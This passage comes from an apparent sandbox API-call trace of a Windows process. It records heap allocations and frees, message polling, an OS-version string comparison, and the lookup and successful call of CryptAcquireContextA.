returned 0x2e54ed8 [0258.295] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.296] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.296] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0258.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0258.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0258.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0258.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0258.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.297] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0258.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0258.297] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0258.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0258.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0258.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0258.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0258.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0258.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0258.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0258.301] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a78 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0258.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699c8 [0258.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0258.302] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0258.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0258.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0258.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0258.303] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0258.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0258.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0258.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0258.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0258.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0258.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.305] HeapFree (in: hHeap=0x970000, 